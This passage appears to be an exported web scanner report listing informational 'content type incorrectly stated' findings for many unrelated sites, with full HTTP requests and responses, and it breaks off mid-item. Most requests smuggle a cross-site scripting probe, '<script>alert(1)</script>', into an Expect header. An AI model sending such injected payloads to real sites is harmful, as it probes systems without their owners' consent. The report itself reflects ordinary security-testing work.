Via: 1.1 12.120.38.40:80 (cache/2.6.2.3.13.ATT), 1.1 12.120.79.19:80 (cache/2.6.2.3.13.ATT)
Connection: keep-alive

GIF87a.............,...........L..;
35.8. http://view.atdmt.com/jaction/cntwir_ServiceFamilyOverview_1/v3/ato.001/[atc1.ProductSub-Category/atc2.threat-vulnerability-management/atc3.network-security]  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://view.atdmt.com
Path:   /jaction/cntwir_ServiceFamilyOverview_1/v3/ato.001/[atc1.ProductSub-Category/atc2.threat-vulnerability-management/atc3.network-security]

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /jaction/cntwir_ServiceFamilyOverview_1/v3/ato.001/[atc1.ProductSub-Category/atc2.threat-vulnerability-management/atc3.network-security] HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465D924574124E3C14DF; ach00=903d/120af:fb75/120af:e2ff/25d1:d2ca/12b1e; ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0:c46edc2/25d1/128fabed/e2ff/4db8a484:cbb7115/12b1e/130edf9b/d2ca/4dbdeda3

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:33:49 GMT
Connection: close
Content-Length: 503

function AT_tags(){
try{var tags = new Array();
var imgs = new Array();
tags = ['http://ec.atdmt.com/images/pixel.gif','http://na.decdna.net/n/61239/71938/EI6/x/e?value=0&trans=&domain=na
...[SNIP]...
35.9. http://www.92kqrs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.92kqrs.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.92kqrs.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:39:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NON DSP COR OTPa OUR IND OTC"
Content-Length: 68
Content-Type: text/html
Set-Cookie: SiteUserIsBot=0; path=/
Set-Cookie: ASPSESSIONIDCSADQTQA=DOHBJHPCELCDEEPCDMDKOFHJ; path=/
Cache-control: private
Set-Cookie: NSC_DjubefmTjuft=ffffffff09021f0d45525d5f4f58455e445a4a423660;path=/

<br>Error, file not found: 404;http://www.92kqrs.com:80/favicon.ico
35.10. http://www.ahima.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ahima.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ahima.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:09:36 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
35.11. http://www.allsup.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.allsup.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.allsup.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:38:54 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
35.12. http://www.babynameshub.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.babynameshub.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.babynameshub.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:24:52 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
35.13. http://www.benchmade.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.benchmade.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.benchmade.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:11:43 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
35.14. http://www.calastrology.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.calastrology.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.calastrology.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Mon, 02 May 2011 00:33:18 GMT
Cache-Control: private
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 19

expectation failed"
35.15. http://www.campingsurvival.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.campingsurvival.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.campingsurvival.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Sun, 01 May 2011 23:53:23 GMT
Cache-Control: private
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 19

expectation failed"
35.16. http://www.cramster.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cramster.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cramster.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:55:55 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
35.17. http://www.crankyape.com/images/AuctionImages/thumb.26361.1.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.crankyape.com
Path:   /images/AuctionImages/thumb.26361.1.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /images/AuctionImages/thumb.26361.1.jpg HTTP/1.1
Host: www.crankyape.com
Proxy-Connection: keep-alive
Referer: http://www.crankyape.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral; ASPSESSIONIDSARCDQAB=LKADMMGCJFEGEIFCGJNABOCD

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 01:53:26 GMT
Content-Length: 24430
Content-Type: image/jpeg
Last-Modified: Thu, 28 Apr 2011 16:21:41 GMT
Accept-Ranges: bytes
ETag: "aaa74b5bc05cc1:6f8c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

.PNG
.
...IHDR...m...R.....^.Z.....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<..^.IDATx^..ut^........i.PC.8v....v..(Y.d..-FK.X....Y.e..!.4M.N.....s~.R..9I.....q=...#}..w..
...[SNIP]...
35.18. https://www.crankyape.com/images/AuctionImages/thumb.26361.1.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.crankyape.com
Path:   /images/AuctionImages/thumb.26361.1.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /images/AuctionImages/thumb.26361.1.jpg HTTP/1.1
Host: www.crankyape.com
Connection: keep-alive
Referer: https://www.crankyape.com/default.asp?pg=DispSingleItem&ItemNumber=26361
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral; ASPSESSIONIDSARCDQAB=LKADMMGCJFEGEIFCGJNABOCD

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 01:53:46 GMT
Content-Length: 24430
Content-Type: image/jpeg
Last-Modified: Thu, 28 Apr 2011 16:21:41 GMT
Accept-Ranges: bytes
ETag: "aaa74b5bc05cc1:6f8c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

.PNG
.
...IHDR...m...R.....^.Z.....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<..^.IDATx^..ut^........i.PC.8v....v..(Y.d..-FK.X....Y.e..!.4M.N.....s~.R..9I.....q=...#}..w..
...[SNIP]...
35.19. https://www.crankyape.com/images/AuctionImages/thumb.26361.2.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.crankyape.com
Path:   /images/AuctionImages/thumb.26361.2.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /images/AuctionImages/thumb.26361.2.jpg HTTP/1.1
Host: www.crankyape.com
Connection: keep-alive
Referer: https://www.crankyape.com/default.asp?pg=DispSingleItem&ItemNumber=26361
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral; ASPSESSIONIDSARCDQAB=LKADMMGCJFEGEIFCGJNABOCD

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 01:53:48 GMT
Content-Length: 23780
Content-Type: image/jpeg
Last-Modified: Thu, 28 Apr 2011 16:21:41 GMT
Accept-Ranges: bytes
ETag: "b8ce525bc05cc1:6f8c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

.PNG
.
...IHDR...m...R.....^.Z.....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<..\bIDATx^....\.....e.,[`...h133333.t%]...... ...v..M...B6......I.:..<O=}N..3..WU]]}...}..9/.
...[SNIP]...
35.20. https://www.crankyape.com/images/AuctionImages/thumb.26361.3.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.crankyape.com
Path:   /images/AuctionImages/thumb.26361.3.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /images/AuctionImages/thumb.26361.3.jpg HTTP/1.1
Host: www.crankyape.com
Connection: keep-alive
Referer: https://www.crankyape.com/default.asp?pg=DispSingleItem&ItemNumber=26361
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral; ASPSESSIONIDSARCDQAB=LKADMMGCJFEGEIFCGJNABOCD

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 01:53:48 GMT
Content-Length: 25942
Content-Type: image/jpeg
Last-Modified: Thu, 28 Apr 2011 16:21:42 GMT
Accept-Ranges: bytes
ETag: "7679df5bc05cc1:6f8c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

.PNG
.
...IHDR...m...R.....^.Z.....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<..d.IDATx^..ex]g...>..0..'133C..3.e...,..-.b...bfff...1v.03TRI%U5..-EU...>....?..g>k...Xc.1...
...[SNIP]...
35.21. https://www.crankyape.com/images/AuctionImages/thumb.26361.4.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.crankyape.com
Path:   /images/AuctionImages/thumb.26361.4.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /images/AuctionImages/thumb.26361.4.jpg HTTP/1.1
Host: www.crankyape.com
Connection: keep-alive
Referer: https://www.crankyape.com/default.asp?pg=DispSingleItem&ItemNumber=26361
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral; ASPSESSIONIDSARCDQAB=LKADMMGCJFEGEIFCGJNABOCD

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 01:53:48 GMT
Content-Length: 22479
Content-Type: image/jpeg
Last-Modified: Thu, 28 Apr 2011 16:21:42 GMT
Accept-Ranges: bytes
ETag: "92c7ed5bc05cc1:6f8c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

.PNG
.
...IHDR...m...R.....^.Z.....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<..WMIDATx^..u..U...{N...-8    q%JHB.8.HB.....U)ww......+.T...o.ih.i.u....zC......s.=..k.9.....g.
...[SNIP]...
35.22. http://www.cyberhomes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cyberhomes.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cyberhomes.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:51:17 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
35.23. http://www.dermnet.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.dermnet.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dermnet.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.0
Date: Mon, 02 May 2011 00:01:47 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
35.24. http://www.developer.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.developer.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.developer.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 08 Mar 2011 21:40:03 GMT
ETag: "576e-49dff7476b2c0"
Accept-Ranges: bytes
Content-Length: 22382
Content-Type: text/plain; charset=UTF-8
Cache-Control: public, max-age=8494
Date: Sun, 01 May 2011 23:16:19 GMT
Connection: close

............ .h...6... .... .........@@.... .(B..F...(....... ..... .....@.................... ... ... ...!...............)...)... ...........!... ... ... ... ... ...!.......!...C&..^>..iI..iJ..^?..C
...[SNIP]...
35.25. http://www.diskeeper.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.diskeeper.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.diskeeper.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:55:50 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
35.26. http://www.earthfare.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.earthfare.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.earthfare.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:10:01 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
35.27. http://www.fastpictureviewer.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.fastpictureviewer.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fastpictureviewer.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Mon, 02 May 2011 00:25:51 GMT
Server: Apache/1.3.41 (Unix) mod_perl/1.30 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Content-Type: text/html; charset=iso-8859-1
Content-Length: 20

HTTP Error Code 417"
35.28. http://www.freegroceriesdirectory.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.freegroceriesdirectory.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.freegroceriesdirectory.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:29:13 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
35.29. http://www.goodtoknow.co.uk/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.goodtoknow.co.uk
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.goodtoknow.co.uk
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 14 Apr 2011 08:28:48 GMT
ETag: "1c90d65-47e-4a0dcb6dc9000"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain
Date: Mon, 02 May 2011 00:18:20 GMT
Connection: close
Set-Cookie: browsertype=web; expires=Tue, 03-May-2011 00:18:20 GMT; path=/; domain=.goodtoknow.co.uk

............ .h.......(....... ..... .......................... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ........................................................... ... ........
...[SNIP]...
35.30. http://www.google.com/uds/Gfeeds  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.google.com
Path:   /uds/Gfeeds

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /uds/Gfeeds?callback=google.feeds.Feed.RawCompletion&context=0&num=3&hl=en&output=json&q=http%3A%2F%2Fnetworkingexchangeblog.att.com%2Fne%2Fmanaging-network-risk-ne%2Ffeed%2F&key=ABQIAAAA5tdpImBf4eDcDKbLmSjk5xTUkbc6-RyEmhXHNETmcLgMd9n64RTmPO4_ao4eAxL3FEA8IPnbDDDvHQ&v=1.0&nocache=1304310827715 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=LumMfILOIubaQ6V3uwnnVHHmx_iWhkqmohHaboUow34NxpZ86tcfWJvUvQuPDaP0OZyKgDOICC-8iGxYmEZ47u1HHIyvJoNYeQNCiphbG7hdYNAS6A3bBKjfIijcHZ_F

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Sun, 01 May 2011 23:33:51 GMT
Content-Type: text/javascript; charset=utf-8
X-Backend-Content-Length: 19202
X-Embedded-Status: 200
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 17498

google.feeds.Feed.RawCompletion('0', {"feed":{"feedUrl":"http://networkingexchangeblog.att.com/ne/managing-network-risk-ne/feed/","title":"Networking Exchange Blog .. Networking Exchange .. Managing R
...[SNIP]...
35.31. http://www.govacuum.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.govacuum.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.govacuum.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:16:49 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
35.32. http://www.gpwa.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.gpwa.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gpwa.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-Server: WP7a
Date: Sun, 01 May 2011 23:44:54 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
35.33. http://www.greenhulk.net/forums/customavatars/avatar21634_4.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.greenhulk.net
Path:   /forums/customavatars/avatar21634_4.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /forums/customavatars/avatar21634_4.gif HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
Referer: http://www.greenhulk.net/forums/showthread.php?126285-Rear-boarding-step
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; gh_lastactivity=0

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:03:34 GMT
Server: Apache
Last-Modified: Wed, 09 Jun 2010 09:30:10 GMT
ETag: "1b70093-1824-488958d5c8c80"
Accept-Ranges: bytes
Content-Length: 6180
Cache-Control: max-age=2419200, public
Expires: Mon, 30 May 2011 02:03:34 GMT
Vary: User-Agent
Content-Type: image/gif

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...
35.34. http://www.greenhulk.net/forums/customavatars/avatar27186_2.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.greenhulk.net
Path:   /forums/customavatars/avatar27186_2.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /forums/customavatars/avatar27186_2.gif HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
Referer: http://www.greenhulk.net/forums/showthread.php?126285-Rear-boarding-step
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; gh_lastactivity=0

Response

HTTP/1.1 200 OK
